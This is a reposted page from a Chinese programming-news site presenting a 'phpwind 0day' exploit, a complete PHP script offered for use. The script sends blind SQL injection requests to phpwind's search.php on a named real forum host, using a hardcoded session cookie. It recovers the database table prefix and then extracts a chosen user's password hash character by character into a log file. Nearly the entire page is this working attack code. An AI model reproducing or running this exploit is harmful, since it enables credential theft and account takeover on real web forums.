广

PHP编程

  • IOS开发
  • android开发
  • PHP编程
  • JavaScript
  • ASP.NET
  • ASP编程
  • JSP编程
  • Java编程
  • 易语言
  • Ruby编程
  • Perl编程
  • AJAX
  • 正则表达式
  • C语言

    • 编程开发

    从网上搜到的phpwind 0day的代码

    2018-10-04 14:38:15 次阅读 稿源:互联网
    零七广告

    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
    <title>Codz By 剑心</title>
    <style type="text/css">
    body,td {
    font-family: "Tahoma";
    font-size: "12px";
    line-height: "150%";
    }
    .smlfont {
    font-family: "Tahoma";
    font-size: "11px";
    }
    .INPUT {
    FONT-SIZE: "12px";
    COLOR: "#000000";
    BACKGROUND-COLOR: "#FFFFFF";
    height: "18px";
    border: "1px solid #666666";
    padding-left: "2px";
    }
    .redfont {
    COLOR: "#A60000";
    }
    a:link,a:visited,a:active {
    color: "#000000";
    text-decoration: underline;
    }
    a:hover {
    color: "#465584";
    text-decoration: none;
    }
    .top {BACKGROUND-COLOR: "#CCCCCC"}
    .firstalt {BACKGROUND-COLOR: "#EFEFEF"}
    .secondalt {BACKGROUND-COLOR: "#F5F5F5"}
    </style>
    <center>The Exploiet Of The All Phpwind Version</center>
    <center> BY 剑心</center>
    <br>
    <br>
    <br>
    <br>
    <br>

    <?php
    ini_set("max_execution_time",0);
    error_reporting(7);

    $path="/search.php";
    $server='bbs.ccidnet.com';
    $cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';

    $useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)";

    $uid=2;
    $_GET['uid']&&$uid=$_GET['uid'];
    $tid=539264;

    $mask='没有查找匹配的内容';
    $count=0;

    //$testing=1;
    //$testing=$_GET['test'];
    if($testing) {preg_match('/X-Powered-By: php//(.+)/r/n/ie',send(""),$php);echo$php[1];die();}

    //$debug=1;

    $temp=md5(rand(1,100)+microtime());
    $cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";
    $response=send($cmd);

    preg_match('/FROM (.+)threads/ie',$response,$match);

    $pre=$match[1];
    if ($match[1]) echo 'Good Job!Wo Got The pre: <font color=red>'.$match[1]."</font><br>";
    else if (strpos($response,'value="登 录"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value!<br>");
    else {echo "Maybe It is not vul!<br>";die();}

    echo "Try to Get the uid=$uid 's Password:<font color=red>";
    $log=fopen('log.txt','a+');

    for($i=0;$i<16;$i++)
    {

    $type=0;
    $sub=$i+9;
    $temp=md5(rand(1,100)+microtime());
    $sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";
    $sql=urlencode($sql);
    $temp=md5(rand(1,100)+microtime());
    $cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
    if(!strpos(send($cmd),$mask)) {

    $type=0;
    for($m=48;$m<=57;$m++){
    $temp=md5(rand(1,100)+microtime());
    $sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
    $sql=urlencode($sql);
    $temp=md5(rand(1,100)+microtime());
    $cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
    if(!strpos(send($cmd),$mask)) {

    echo chr($m);
    fputs($log,chr($m));
    break;
    }
    continue;
    }
    continue;
    }

    $sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";
    $sql=urlencode($sql);
    $temp=md5(rand(1,10000)+microtime());
    $cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
    if(!strpos(send($cmd),$mask)) {

    $type=1;
    for($m=97;$m<=122;$m++){
    $temp=md5(rand(1,100)+microtime());
    $sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
    $sql=urlencode($sql);
    $temp=md5(rand(1,100)+microtime());
    $cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
    if(!strpos(send($cmd),$mask)) {
    echo chr($m);
    fputs($log,chr($m));
    break;
    }
    continue;
    }
    continue;
    }

    echo "error!<br>";
    die("Shit!May be the data you post is Not valid!Try anthor UID/r/n");

    }
    fclose($log);
    echo "<br>Done!We Post $count times!<br>";

    function send($cmd)
    {
    global $path,$server,$cookie,$count,$useragent,$debug;

    $count=$count+1;
    $message = "POST ".$path."? HTTP/1.1/r/n";
    $message .= "Accept: */*/r/n";
    $message .= "Accept-Language: zh-cn/r/n";
    $message .= "Referer: http://".$server.$path."/r/n";
    $message .= "Content-Type: application/x-www-form-urlencoded/r/n";
    $message .= "User-Agent: ".$useragent."/r/n";
    $message .= "Host: ".$server."/r/n";
    $message .= "Content-length: ".strlen($cmd)."/r/n";
    $message .= "Connection: Keep-Alive/r/n";
    $message .= "Cookie: ".$cookie."/r/n";
    $message .= "/r/n";
    $message .= $cmd."/r/n";

    $fd = fsockopen( $server, 80 );
    fputs($fd,$message);
    $resp = "<pre>";
    while($fd&&!feof($fd)) {
    $resp .= fread($fd,1024);
    }
    fclose($fd);
    $resp .="</pre>";
    if($debug) {echo $cmd;echo $resp;}
    return $resp;
    }
    ?>

    点赞
    收藏

    零七网部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与零七网进行文章共享合作。

    零七广告
    零七广告

    最新PHP编程

    零七广告

    热点PHP编程

    零七广告
    © 2018 零七网(WWW.07LA.COM)
    网站介绍 合作联系 寻求报道 投稿指南